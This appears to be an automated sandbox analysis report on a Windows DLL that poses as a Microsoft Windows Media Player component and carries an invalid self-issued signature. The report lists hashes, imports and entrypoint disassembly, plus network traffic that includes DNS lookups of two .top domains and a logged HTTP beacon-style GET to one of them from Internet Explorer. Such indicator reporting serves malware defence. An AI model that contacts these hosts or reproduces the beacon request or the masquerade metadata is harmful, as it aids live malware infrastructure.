                        SHA-512:9D06774BFCAD97F9BB46B67B4D061CF547E7956EC70EE7C8D82F1617C3E81555F0EA25AE7CEF847E27C2D3BCEA19DEE912ACFBE85C85AD0DEDF0B6DEFD90347F
                        Malicious:false
                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\~DF3BDE2C19B223BD97.TMP
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12933
                        Entropy (8bit):0.4082977278331884
                        Encrypted:false
                        SSDEEP:24:c9lLh9lLh9lIn9lIn9logUS9logUC9lWgUWUzgUbUhUzgUVUXU3:kBqoIg4gmgRkgA2kgCUw
                        MD5:23F6F6B07B5E7E986466E1CD2C4B5FB4
                        SHA1:17E7B294F38E630D17E00A334F7B5D722A082752
                        SHA-256:2376D6EBB665AB2483161DF184CD9E4B5C409030BBA45D244DAA9401CDA61352
                        SHA-512:11175CB1340AD507F58D108BE07F56B3DE7A3E39EB5F518B9B8C0A5E2CF21BDF72B47DCB6E1AE0BAEEDF96A369CDA555097203F954084586857537D5B122CFD8
                        Malicious:false
                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\~DF4EBD4894B35EDD90.TMP
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):39633
                        Entropy (8bit):0.567384082930945
                        Encrypted:false
                        SSDEEP:96:kBqoxKAuvScS+j9PGN3334OC334Oi334Or:kBqoxKAuqR+j9PGN3n4OCn4Oin4Or
                        MD5:4862725EC73842A1146F44DA0C1DCB2D
                        SHA1:EFA859B3E2CAFE2EEB0528E5C37CE94337C03C06
                        SHA-256:523DA11F99BDC035433B7AD42642F058492A4E63ED357D193839809F8D560A4F
                        SHA-512:0EA6C157FAF1C9484A69C107E1BA43E1388BFCA3E55C93B8572E1DF6EB17B76BAF9350215504A931C6C8DD652C6743F722187FBF08031CC05559DCEA800EA86E
                        Malicious:false
                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\~DFBDDB979C06B382E7.TMP
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12933
                        Entropy (8bit):0.40568636521364454
                        Encrypted:false
                        SSDEEP:24:c9lLh9lLh9lIn9lIn9loEDS9loEDC9lWEDg2oIrXR+IIrXSIF3:kBqoIwOoDrwrn
                        MD5:467079A72B9542080A17D7020CEA1EA5
                        SHA1:C6C24309BE84C5C36B8C154C37B4399C30FEA861
                        SHA-256:B6CEF05D56E0CF94B3747781D495F1B81F445F23B4A1E12848350175554FBBC3
                        SHA-512:A7B1D3E1E3480EF7BFD6A11E2D6CD923DA3418D7747D3126D9A5A7189DAD453E77D13200A831F263AFA319C17E89B76077644B4BF37B80E04EDFCD34EAE7039F
                        Malicious:false
                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\~DFD4CA446EF33C2D57.TMP
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):39617
                        Entropy (8bit):0.5661717333321002
                        Encrypted:false
                        SSDEEP:96:kBqoxKAuvScS+EiIZCUxboMYxboMgxboMR:kBqoxKAuqR+EiIZCUxbonxboTxbo4
                        MD5:F3F63A0DA97DF0202CBE6FB587020099
                        SHA1:28EF2148B441B85BE2DDC9FBDC0EAE7233E710DC
                        SHA-256:22516C1B3F3F5028D7364B248D4FDF1924FAA1BA29CF4AEEC7A1131F4E38EF4D
                        SHA-512:8A9B7438433A8D15C282099A65EF4E4947E688F6F06E39D3F9CD61B69F69282346F660D14E04E731333C09C297E6705E97A1DA58441C1F49D114D4A02449A335
                        Malicious:false
                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\~DFDF7FEAB4721FD8E2.TMP
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):39649
                        Entropy (8bit):0.5736007353148195
                        Encrypted:false
                        SSDEEP:96:kBqoxKAuvScS+IOEV+Qejcp5ejcpNejcpy:kBqoxKAuqR+IOEV+Qewp5ewpNewpy
                        MD5:1D852009F05DA7DF995E7535A4709495
                        SHA1:018E6040EE0A99AE26B2141A577BDBBD8C0D8A70
                        SHA-256:BA91F56D73CEFF88360862E08E54FF1B190BB918B4F25156BEF682CD061769B2
                        SHA-512:34D754E5B46105510EEBF07005BA34F355A31C93BBF5B1878C55468507DA45E8B855995E6350528E49AB970ED1EFD2CBE8023DD5481C23378398384094C34184
                        Malicious:false
                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Temp\~DFF6F6BADDE9A18747.TMP
                        Process:C:\Program Files\internet explorer\iexplore.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12933
                        Entropy (8bit):0.40633329185700595
                        Encrypted:false
                        SSDEEP:24:c9lLh9lLh9lIn9lIn9loyfS9loyfC9lWyf2fQfFfzfQf2YHfxf3:kBqoIys3
                        MD5:7C0D373B4B13410A8135BC0B8DCCDCC0
                        SHA1:B59FD3076421306B8C71FCDF0112BCA3051C0F2A
                        SHA-256:F0D3ADAF55E47D21B0C9675965A8C0BEED1BA4BE1979C573A14E5EFBD66210C0
                        SHA-512:CE629A4BFAD6597BA4695A5270E25DAFA25618B1A7E0C733822E07CDB507634A704228DA859D7F1BA56C6084F252C54EA67C3A5293CE1391496DA666AA802677
                        Malicious:false
                        Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):3.911923467563189
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.39%
                        • Win16/32 Executable Delphi generic (2074/23) 0.21%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • VXD Driver (31/22) 0.00%
                        File name:OgQJzDbLce.dll
                        File size:313176
                        MD5:5268c190b3a6940bc7c8f0361f3a187f
                        SHA1:56b1b5066f88e07f494e5e97f9a8b791cc9d7bd2
                        SHA256:8e34c697b603788b9baeecfb375c466cb8468a322d6ae9b81fc41fb61472c3da
                        SHA512:c44274ee84f9fdfdce444b36e33b2ca2db265cbc99a9ffb7fe5ebbbc79cb9b82f19cb93477d4211d9122cd7043a5964c115d2bc4adc4af0ef7c0b60b069481d0
                        SSDEEP:1536:34UeRdT1u9JFuuhY03X67MMOo+xT0/7Hbo5ioQ+pQ:IUe2aW6CKE5rQ
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[._...........!...2.............................................................4.....................................

                        File Icon

                        Icon Hash:74f0e4ecccdce0e4

                        Static PE Info

                        General

                        Entrypoint:0x1002f010
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x10000000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                        DLL Characteristics:
                        Time Stamp:0x5FFC5BBD [Mon Jan 11 14:07:57 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:302dc27ee8fb51d51fd455c5c954a121

                        Authenticode Signature

                        Signature Valid:false
                        Signature Issuer:CN=XFYFPUHYTZABTVZNTR
                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                        Error Number:-2146762487
                        Not Before, Not After
                        • 1/11/2021 12:21:35 AM 1/1/2040 12:59:59 AM
                        Subject Chain
                        • CN=XFYFPUHYTZABTVZNTR
                        Version:3
                        Thumbprint MD5:BB4518AF652AB34118DB294048EC2292
                        Thumbprint SHA-1:C0D055129F95529EA2B2D89554BF80520281570D
                        Thumbprint SHA-256:22031A72E03D309F0C1E229440904D068D6D8F87D2CDE4DC11EC76DE301B9DA3
                        Serial:5D3EDE33956CF3B547584EF32177B187

                        Entrypoint Preview

                        Instruction
                        push ebp
                        mov ebp, esp
                        sub esp, 50h
                        mov dword ptr [ebp-08h], 00000001h
                        mov dword ptr [ebp-04h], 00000000h
                        mov eax, ebp
                        mov ecx, dword ptr [eax+08h]
                        mov dword ptr [1004B4C0h], ecx
                        mov dword ptr [1004B4A0h], ebp
                        mov dword ptr [ebp-10h], 00000001h
                        mov dword ptr [ebp-14h], 00000001h
                        mov dword ptr [ebp-18h], 00000001h
                        mov dword ptr [ebp-0Ch], 00000001h
                        mov eax, dword ptr [ebp-18h]
                        push eax
                        call dword ptr [1004AB44h]
                        mov dword ptr [ebp-34h], 00000001h
                        mov dword ptr [ebp-3Ch], 00000001h
                        mov dword ptr [ebp-4Ch], 00000001h
                        mov dword ptr [ebp-24h], 00000001h
                        mov dword ptr [ebp-30h], 00000001h
                        mov dword ptr [ebp-38h], 00000001h
                        mov dword ptr [ebp-48h], 00000001h
                        mov dword ptr [ebp-20h], 00000001h
                        mov dword ptr [ebp-2Ch], 00000001h
                        mov dword ptr [ebp-40h], 00000001h
                        mov dword ptr [ebp-28h], 00000001h
                        mov dword ptr [ebp-44h], 00000001h
                        mov dword ptr [ebp-1Ch], 00000001h
                        mov ecx, dword ptr [ebp-24h]
                        push ecx
                        call dword ptr [1004AB18h]
                        mov edx, dword ptr [ebp-1Ch]
                        add edx, 33h
                        mov dword ptr [ebp-1Ch], edx
                        mov eax, dword ptr [ebp-24h]
                        push eax
                        call dword ptr [1004AB18h]
                        mov ecx, dword ptr [ebp-1Ch]
                        add ecx, 00000000h

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x4a76c0xa0.data
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4c0000x11a8.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x4b2000x1558
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000x398.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x4a9fc0x1f0.data
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x2fe9f0x30000False0.279159545898data4.882308777IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .data20x310000x640x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .data0x320000x1951c0x19600False0.0185691194581data0.340193889812IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc0x4c0000x11a80x1200False0.394314236111data4.62126050947IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x4e0000x3980x400False0.8388671875data6.25576957826IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        REGISTRY0x4c1580x17cASCII text, with CRLF line terminatorsEnglishUnited States
                        TYPELIB0x4c2d40x708dataEnglishUnited States
                        RT_RCDATA0x4c9dc0x410XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                        RT_VERSION0x4cdec0x3bcdataEnglishUnited States

                        Imports

                        DLLImport
                        KERNEL32.dllQueryPerformanceFrequency, GetDateFormatW, ResetEvent, QueryPerformanceCounter, SetEvent, GetCurrentProcess, OpenEventW, ResumeThread, WaitForSingleObject, DuplicateHandle, WriteFile, GetLastError, GetExitCodeThread, CreateFileW, MoveFileW, lstrlenA, ReadFile, Sleep, GetFileSize, CreateEventW, GetLocaleInfoW, CloseHandle, GetLocalTime, LoadLibraryW, GetWindowsDirectoryW, FormatMessageW, CreateProcessW, LocalFree, FindFirstFileW, CopyFileW, FindClose, SetLastError, CreateDirectoryW, lstrlenW, GetSystemDirectoryW, GetTempPathW, GetDriveTypeW, GetFileTime, GetUserDefaultLCID, ExpandEnvironmentStringsW, GetPrivateProfileStringW, GetFileInformationByHandle, GetFileAttributesA, FileTimeToDosDateTime, GetSystemInfo, CreateFileA, WideCharToMultiByte, FileTimeToLocalFileTime, lstrcmpiW, GetTempFileNameW, GetFileAttributesW, GetProcAddress, LocalAlloc, GetModuleHandleW, GetStartupInfoW, DeleteFileW, ExitProcess, GetTickCount, LoadLibraryA, MultiByteToWideChar, FreeLibrary, GetModuleHandleA, GetStdHandle, GetConsoleScreenBufferInfo, VirtualAlloc, HeapFree, GetProcessHeap, HeapAlloc, VirtualFree, SetConsoleCtrlHandler
                        USER32.dllGetClipboardData, LoadIconW
                        GDI32.dllGetKerningPairsA, CreateEllipticRgn, PATHOBJ_vEnumStartClipLines, GetBoundsRect, FONTOBJ_pfdg, GetDIBColorTable, SetTextCharacterExtra, GetTextFaceW, EndPage, GetColorSpace, RealizePalette
                        COMDLG32.dllGetOpenFileNameW
                        ADVAPI32.dllIsTextUnicode, RegCloseKey, RegCreateKeyExW, RegOpenKeyExW, RegEnumKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegSetValueExW, RegDeleteKeyW, RegDeleteValueW, RegGetKeySecurity, RegOpenKeyW, RegSetKeySecurity, RegConnectRegistryW
                        SHELL32.dllExtractIconW, DragQueryFileAorW, SHBindToParent, DoEnvironmentSubstW, ExtractIconA, ShellExecuteA, SHCreateProcessAsUserW, SHPathPrepareForWriteW, SHPathPrepareForWriteA, SHIsFileAvailableOffline, ExtractAssociatedIconW, SHGetSpecialFolderPathA, ShellExecuteEx, DragAcceptFiles, ExtractAssociatedIconA
                        SHLWAPI.dllStrChrIA, StrRChrIW, StrCmpNW, StrChrA

                        Version Infos

                        DescriptionData
                        LegalCopyright Microsoft Corporation. All rights reserved.
                        InternalNamewmprph.exe
                        FileVersion12.0.7600.16385 (win7_rtm.090713-1255)
                        CompanyNameMicrosoft Corporation
                        ProductNameMicrosoft Windows Operating System
                        ProductVersion12.0.7600.16385
                        FileDescriptionWindows Media Player Rich Preview Handler
                        OriginalFilenamewmprph.exe
                        Translation0x0409 0x04b0

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 11, 2021 19:18:58.637449026 CET4976680192.168.2.4193.56.255.166
                        Jan 11, 2021 19:18:58.637895107 CET4976780192.168.2.4193.56.255.166
                        Jan 11, 2021 19:18:59.652379036 CET4976780192.168.2.4193.56.255.166
                        Jan 11, 2021 19:18:59.652384996 CET4976680192.168.2.4193.56.255.166
                        Jan 11, 2021 19:19:01.652669907 CET4976780192.168.2.4193.56.255.166
                        Jan 11, 2021 19:19:01.668169022 CET4976680192.168.2.4193.56.255.166
                        Jan 11, 2021 19:19:05.671752930 CET4976880192.168.2.4193.56.255.166
                        Jan 11, 2021 19:19:05.685636997 CET4976980192.168.2.4193.56.255.166
                        Jan 11, 2021 19:19:06.684380054 CET4976880192.168.2.4193.56.255.166
                        Jan 11, 2021 19:19:06.684417963 CET4976980192.168.2.4193.56.255.166
                        Jan 11, 2021 19:19:08.684454918 CET4976880192.168.2.4193.56.255.166
                        Jan 11, 2021 19:19:08.684526920 CET4976980192.168.2.4193.56.255.166
                        Jan 11, 2021 19:19:58.675662994 CET4977180192.168.2.492.38.132.181
                        Jan 11, 2021 19:19:58.676135063 CET4977080192.168.2.492.38.132.181
                        Jan 11, 2021 19:19:58.842180967 CET804977192.38.132.181192.168.2.4
                        Jan 11, 2021 19:19:58.842485905 CET804977092.38.132.181192.168.2.4
                        Jan 11, 2021 19:19:58.843215942 CET4977180192.168.2.492.38.132.181
                        Jan 11, 2021 19:19:58.843277931 CET4977080192.168.2.492.38.132.181
                        Jan 11, 2021 19:19:58.844620943 CET4977080192.168.2.492.38.132.181
                        Jan 11, 2021 19:19:59.010343075 CET804977092.38.132.181192.168.2.4
                        Jan 11, 2021 19:19:59.010474920 CET4977080192.168.2.492.38.132.181
                        Jan 11, 2021 19:19:59.014595985 CET4977080192.168.2.492.38.132.181
                        Jan 11, 2021 19:19:59.180378914 CET804977092.38.132.181192.168.2.4
                        Jan 11, 2021 19:19:59.374355078 CET4977180192.168.2.492.38.132.181
                        Jan 11, 2021 19:19:59.539839983 CET804977192.38.132.181192.168.2.4
                        Jan 11, 2021 19:19:59.540218115 CET4977180192.168.2.492.38.132.181
                        Jan 11, 2021 19:19:59.540604115 CET4977180192.168.2.492.38.132.181
                        Jan 11, 2021 19:19:59.706584930 CET804977192.38.132.181192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 11, 2021 19:17:13.728465080 CET5299153192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:13.776426077 CET53529918.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:14.899044991 CET5370053192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:14.947060108 CET53537008.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:16.134349108 CET5172653192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:16.183490992 CET53517268.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:17.316296101 CET5679453192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:17.365488052 CET53567948.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:18.543859005 CET5653453192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:18.591643095 CET53565348.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:20.270620108 CET5662753192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:20.321528912 CET53566278.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:21.431942940 CET5662153192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:21.482697010 CET53566218.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:23.037543058 CET6311653192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:23.095849037 CET53631168.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:24.173182964 CET6407853192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:24.223839998 CET53640788.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:25.405437946 CET6480153192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:25.461977959 CET53648018.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:26.528758049 CET6172153192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:26.576582909 CET53617218.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:27.789350986 CET5125553192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:27.840101004 CET53512558.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:31.651175976 CET6152253192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:31.702140093 CET53615228.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:37.523211002 CET5233753192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:37.571157932 CET53523378.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:42.095158100 CET5504653192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:42.158015013 CET53550468.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:56.574376106 CET4961253192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:56.646744967 CET53496128.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:57.340466022 CET4928553192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:57.396816015 CET53492858.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:57.949260950 CET5060153192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:58.008524895 CET53506018.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:58.401261091 CET6087553192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:58.424139977 CET5644853192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:58.472059011 CET53608758.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:58.480787992 CET53564488.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:58.947978020 CET5917253192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:59.056448936 CET53591728.8.8.8192.168.2.4
                        Jan 11, 2021 19:17:59.920516014 CET6242053192.168.2.48.8.8.8
                        Jan 11, 2021 19:17:59.977058887 CET53624208.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:00.565299988 CET6057953192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:00.621866941 CET53605798.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:01.463937998 CET5018353192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:01.520250082 CET53501838.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:01.791364908 CET6153153192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:01.852602005 CET53615318.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:02.311281919 CET4922853192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:02.372957945 CET53492288.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:03.041776896 CET5979453192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:04.038800955 CET5979453192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:04.095683098 CET53597948.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:13.464627028 CET5591653192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:13.512702942 CET53559168.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:13.857961893 CET5275253192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:13.916877031 CET53527528.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:14.372106075 CET6054253192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:14.432737112 CET53605428.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:15.591245890 CET6068953192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:15.661892891 CET53606898.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:15.666835070 CET6420653192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:15.723268986 CET53642068.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:15.732852936 CET5090453192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:15.789099932 CET53509048.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:17.501837015 CET5752553192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:17.561764002 CET53575258.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:44.371268988 CET5381453192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:44.419553995 CET53538148.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:45.388396025 CET5381453192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:45.436148882 CET53538148.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:46.386667013 CET5381453192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:46.434607029 CET53538148.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:48.402055979 CET5381453192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:48.450495958 CET53538148.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:51.038003922 CET5341853192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:51.085899115 CET53534188.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:52.417939901 CET5381453192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:52.465867043 CET53538148.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:52.960946083 CET6283353192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:53.030009031 CET53628338.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:57.541655064 CET5926053192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:57.602686882 CET53592608.8.8.8192.168.2.4
                        Jan 11, 2021 19:18:58.559163094 CET4994453192.168.2.48.8.8.8
                        Jan 11, 2021 19:18:58.615565062 CET53499448.8.8.8192.168.2.4
                        Jan 11, 2021 19:19:12.693413973 CET6330053192.168.2.48.8.8.8
                        Jan 11, 2021 19:19:12.749691010 CET53633008.8.8.8192.168.2.4
                        Jan 11, 2021 19:19:34.145577908 CET6144953192.168.2.48.8.8.8
                        Jan 11, 2021 19:19:34.203614950 CET53614498.8.8.8192.168.2.4
                        Jan 11, 2021 19:19:35.314510107 CET5127553192.168.2.48.8.8.8
                        Jan 11, 2021 19:19:35.389287949 CET53512758.8.8.8192.168.2.4
                        Jan 11, 2021 19:19:35.394572973 CET6349253192.168.2.48.8.8.8
                        Jan 11, 2021 19:19:35.453552961 CET53634928.8.8.8192.168.2.4
                        Jan 11, 2021 19:19:35.461821079 CET5894553192.168.2.48.8.8.8
                        Jan 11, 2021 19:19:35.517985106 CET53589458.8.8.8192.168.2.4
                        Jan 11, 2021 19:19:57.094701052 CET6077953192.168.2.48.8.8.8
                        Jan 11, 2021 19:19:57.151117086 CET53607798.8.8.8192.168.2.4
                        Jan 11, 2021 19:19:58.227552891 CET6401453192.168.2.48.8.8.8
                        Jan 11, 2021 19:19:58.653007030 CET53640148.8.8.8192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Jan 11, 2021 19:18:58.559163094 CET192.168.2.48.8.8.80xdf0fStandard query (0)babidone.topA (IP address)IN (0x0001)
                        Jan 11, 2021 19:19:12.693413973 CET192.168.2.48.8.8.80x9d45Standard query (0)babidone.topA (IP address)IN (0x0001)
                        Jan 11, 2021 19:19:58.227552891 CET192.168.2.48.8.8.80xd523Standard query (0)begoventa.topA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Jan 11, 2021 19:18:58.615565062 CET8.8.8.8192.168.2.40xdf0fNo error (0)babidone.top193.56.255.166A (IP address)IN (0x0001)
                        Jan 11, 2021 19:19:12.749691010 CET8.8.8.8192.168.2.40x9d45No error (0)babidone.top193.56.255.166A (IP address)IN (0x0001)
                        Jan 11, 2021 19:19:58.653007030 CET8.8.8.8192.168.2.40xd523No error (0)begoventa.top92.38.132.181A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • begoventa.top

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.44977092.38.132.18180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                        TimestampkBytes transferredDirectionData
                        Jan 11, 2021 19:19:58.844620943 CET4752OUTGET /images/HRdOnZXQubvEpiF/dnOBFJ5ijbSGwRmyqM/h51pT26O9/4EIbVpHBFlOcgrt0TShq/pPJJGC5mrcZE6ZGUWjS/LKs0W_2FZrtLgELoKDEbZR/8X1_2FxjVbkZk/tVcM_2Bd/jQmX3NhgeWRqCDsfD_2BayQ/lSPwdIYz4P/81sFvcaWcXolUgVkt/y_2B1p3Gvpg_/2F0X2_2F87o/JZseyqJj/p.avi HTTP/1.1
                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                        Accept-Language: en-US
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                        Accept-Encoding: gzip, deflate
                        Host: begoventa.top
                        Connection: Keep-Alive
                        Jan 11, 2021 19:19:59.010343075 CET4752INHTTP/1.0 503 Service Unavailable
                        Cache-Control: no-cache
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
